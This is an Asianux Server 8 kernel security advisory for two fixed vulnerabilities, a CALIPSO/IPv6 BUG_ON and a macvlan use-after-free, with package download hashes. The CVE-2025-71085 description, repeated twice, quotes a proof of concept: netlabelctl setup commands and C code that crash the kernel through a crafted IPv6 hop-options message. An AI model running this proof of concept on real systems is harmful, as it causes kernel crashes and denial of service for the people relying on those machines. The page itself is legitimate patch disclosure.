kernel-4.18.0-553.111.1.el8_10

エラータID: AXSA:2026-310:19

Release date: 
Monday, March 16, 2026 - 18:12
Subject: 
kernel-4.18.0-553.111.1.el8_10
Affected Channels: 
Asianux Server 8 for x86_64
Severity: 
Moderate
Description: 

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (CVE-2025-71085)
* kernel: macvlan: fix possible UAF in macvlan_forward_source() (CVE-2026-23001)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

CVE-2025-71085
In the Linux kernel, the following vulnerability has been resolved: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() There exists a kernel oops caused by a BUG_ON(nhead < 0) at net/core/skbuff.c:2232 in pskb_expand_head(). This bug is triggered as part of the calipso_skbuff_setattr() routine when skb_cow() is passed headroom > INT_MAX (i.e. (int)(skb_headroom(skb) + len_delta) < 0). The root cause of the bug is due to an implicit integer cast in __skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure that delta = headroom - skb_headroom(skb) is never negative, otherwise we will trigger a BUG_ON in pskb_expand_head(). However, if headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta becomes negative, and pskb_expand_head() is passed a negative value for nhead. Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing "negative" headroom sizes to skb_cow() within calipso_skbuff_setattr() by only using skb_cow() to grow headroom. PoC: Using `netlabelctl` tool: netlabelctl map del default netlabelctl calipso add pass doi:7 netlabelctl map add default address:0::1/128 protocol:calipso,7 Then run the following PoC: int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP); // setup msghdr int cmsg_size = 2; int cmsg_len = 0x60; struct msghdr msg; struct sockaddr_in6 dest_addr; struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1, sizeof(struct cmsghdr) + cmsg_len); msg.msg_name = &dest_addr; msg.msg_namelen = sizeof(dest_addr); msg.msg_iov = NULL; msg.msg_iovlen = 0; msg.msg_control = cmsg; msg.msg_controllen = cmsg_len; msg.msg_flags = 0; // setup sockaddr dest_addr.sin6_family = AF_INET6; dest_addr.sin6_port = htons(31337); dest_addr.sin6_flowinfo = htonl(31337); dest_addr.sin6_addr = in6addr_loopback; dest_addr.sin6_scope_id = 31337; // setup cmsghdr cmsg->cmsg_len = cmsg_len; cmsg->cmsg_level = IPPROTO_IPV6; cmsg->cmsg_type = IPV6_HOPOPTS; char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr); hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80 sendmsg(fd, &msg, 0);
CVE-2026-23001
In the Linux kernel, the following vulnerability has been resolved: macvlan: fix possible UAF in macvlan_forward_source() Add RCU protection on (struct macvlan_source_entry)->vlan. Whenever macvlan_hash_del_source() is called, we must clear entry->vlan pointer before RCU grace period starts. This allows macvlan_forward_source() to skip over entries queued for freeing. Note that macvlan_dev are already RCU protected, as they are embedded in a standard netdev (netdev_priv(ndev)). https: //lore.kernel.org/netdev/695fb1e8.050a0220.1c677c.039f.GAE@google.com/T/#u

Solution: 

Update packages.

CVEs: 
CVE-2025-71085
In the Linux kernel, the following vulnerability has been resolved: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() There exists a kernel oops caused by a BUG_ON(nhead < 0) at net/core/skbuff.c:2232 in pskb_expand_head(). This bug is triggered as part of the calipso_skbuff_setattr() routine when skb_cow() is passed headroom > INT_MAX (i.e. (int)(skb_headroom(skb) + len_delta) < 0). The root cause of the bug is due to an implicit integer cast in __skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure that delta = headroom - skb_headroom(skb) is never negative, otherwise we will trigger a BUG_ON in pskb_expand_head(). However, if headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta becomes negative, and pskb_expand_head() is passed a negative value for nhead. Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing "negative" headroom sizes to skb_cow() within calipso_skbuff_setattr() by only using skb_cow() to grow headroom. PoC: Using `netlabelctl` tool: netlabelctl map del default netlabelctl calipso add pass doi:7 netlabelctl map add default address:0::1/128 protocol:calipso,7 Then run the following PoC: int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP); // setup msghdr int cmsg_size = 2; int cmsg_len = 0x60; struct msghdr msg; struct sockaddr_in6 dest_addr; struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1, sizeof(struct cmsghdr) + cmsg_len); msg.msg_name = &dest_addr; msg.msg_namelen = sizeof(dest_addr); msg.msg_iov = NULL; msg.msg_iovlen = 0; msg.msg_control = cmsg; msg.msg_controllen = cmsg_len; msg.msg_flags = 0; // setup sockaddr dest_addr.sin6_family = AF_INET6; dest_addr.sin6_port = htons(31337); dest_addr.sin6_flowinfo = htonl(31337); dest_addr.sin6_addr = in6addr_loopback; dest_addr.sin6_scope_id = 31337; // setup cmsghdr cmsg->cmsg_len = cmsg_len; cmsg->cmsg_level = IPPROTO_IPV6; cmsg->cmsg_type = IPV6_HOPOPTS; char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr); hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80 sendmsg(fd, &msg, 0);
CVE-2026-23001
In the Linux kernel, the following vulnerability has been resolved: macvlan: fix possible UAF in macvlan_forward_source() Add RCU protection on (struct macvlan_source_entry)->vlan. Whenever macvlan_hash_del_source() is called, we must clear entry->vlan pointer before RCU grace period starts. This allows macvlan_forward_source() to skip over entries queued for freeing. Note that macvlan_dev are already RCU protected, as they are embedded in a standard netdev (netdev_priv(ndev)). https: //lore.kernel.org/netdev/695fb1e8.050a0220.1c677c.039f.GAE@google.com/T/#u
Additional Info: 

N/A

Download: 

SRPMS
  1. kernel-4.18.0-553.111.1.el8_10.src.rpm
    MD5: e3a2e61f4dbfe238601244775c021eda
    SHA-256: a84eb0f84e9b4f2220a3db2990bef6c1613e573e4965640ef7a2416b07a8e5c6
    Size: 132.35 MB

Asianux Server 8 for x86_64
  1. bpftool-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: c4b045b812063cd9c4ee56ea07dcb05f
    SHA-256: abb88e8d795827d3012603bcb4f78ff29b4e65d998e4a00736455047dce68e65
    Size: 11.28 MB
  2. kernel-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: f466ed192d30e7aeda0a9d5b442a853b
    SHA-256: 2eb549c8d10b281e81f63038021aebdfb10bf51ef77b64477e1a834417a516d2
    Size: 10.56 MB
  3. kernel-abi-stablelists-4.18.0-553.111.1.el8_10.noarch.rpm
    MD5: 5444583b6badf917dfad96c10ee7da48
    SHA-256: 8e450de9ca796f36e85e23529e87c44e938e101c1a671d5256a82c2955b9bfab
    Size: 10.57 MB
  4. kernel-core-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 7392ebf1c78c641107870fc79d74549b
    SHA-256: ac20eed445df90611e93c26f9db76d1aa6a804fe346953c9366fbea73bba0cda
    Size: 43.59 MB
  5. kernel-cross-headers-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: a4d42330e721cbe8d39981ceb6fd0e79
    SHA-256: e82ae24720fbf2745493648ec6f2814b80811be87da2ba990e462262edc2b4e9
    Size: 15.90 MB
  6. kernel-debug-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: b48bfb225c57abb7ed6aa88378966cc4
    SHA-256: 85dfc33201ff27e0720fbd29cdeab6d0f1622d4ee9a9bbf77cb8b188905b86a5
    Size: 10.55 MB
  7. kernel-debug-core-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 95e74dd9d4e2ca9e9e64c9741537e487
    SHA-256: 7dce15be0d3ed7b9d2353e6def841d213f666a2473fabc8bafcda7d44e133314
    Size: 72.90 MB
  8. kernel-debug-devel-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: ca3d296670b9bec18c0b8c67a1f29424
    SHA-256: 9782430735a0ca97d8a829ee48bfc949be20ee9dad02716add4707486c01af7b
    Size: 24.40 MB
  9. kernel-debug-modules-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 29f04e7700d18b357e0c94b1a22b7a9b
    SHA-256: a48d15471f0523d83ebcd5477c2ef0ace6d94bfff0c41f7a65948094f5126770
    Size: 66.02 MB
  10. kernel-debug-modules-extra-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 4230847dca1e7904c679dda55fb80389
    SHA-256: 0e73024441a84114c52169b84c44778756702c08b27d66de827bda0e9ca95fff
    Size: 11.93 MB
  11. kernel-devel-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 4b69d8c23a996f9959ca334179d68ffe
    SHA-256: 00ec529b45c1f0779d88c50f039be1fbda61836597741a99412bd75523c80bf7
    Size: 24.20 MB
  12. kernel-doc-4.18.0-553.111.1.el8_10.noarch.rpm
    MD5: 36a3ae1f15e039c12fe925925291b08a
    SHA-256: 9c838af0676de0edf629d8a87008b64061e1614534236343e96771ad75e5407e
    Size: 28.43 MB
  13. kernel-headers-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 66e82034ce8325a21fb812ea8e1b0928
    SHA-256: 17f3539bb6f414698ead002ff0de8429c34b457b15ba3c1a33747a270b14b859
    Size: 11.91 MB
  14. kernel-modules-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 1a6d999425c8462cec58326ec6f25b67
    SHA-256: 147d8055e9e7a6e8c4a989003c08d7ff4a2c7ae3e1826b7b3222245c6b0a2fc9
    Size: 36.40 MB
  15. kernel-modules-extra-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 8dcc261adf0bbac05c577e22724da01f
    SHA-256: e1b2beac3a93a3c5e138eec15fb0504f02277c7dd4afa8b566a52014368bd0bf
    Size: 11.24 MB
  16. kernel-tools-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: fa956c37e0719b2bcdc16c32ff7c20f0
    SHA-256: c05975f3b1dc789d92877eedf8ec114024589e53e7b3361816f6d5483a6aa7c4
    Size: 10.77 MB
  17. kernel-tools-libs-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: cac862b17446e016f87804ca819faaaa
    SHA-256: 3aad828496f1e71eb33f9755f41d0c760d76e9d77a285865950ec789ed5067b8
    Size: 10.56 MB
  18. kernel-tools-libs-devel-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 23aadb39608d546be2dc8f4615e1afd4
    SHA-256: ab0379582718e6eea87bb042ae443ffaa894d799cedbe2a12e7a1603894ed3d8
    Size: 10.56 MB
  19. perf-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 3f21b3f7cd0f80ec49cb379d77368422
    SHA-256: 3e022f8db0d28803f8630728f9a95e773c580fe0573908497105beab83d4332c
    Size: 12.88 MB
  20. python3-perf-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 2c8de097c64a54ea5e65d45c8d19c8b9
    SHA-256: 51e9b2b17d8ff7a8ea67831b010277b0d661fd07a80cd1b67658a55e85d75f0d
    Size: 10.68 MB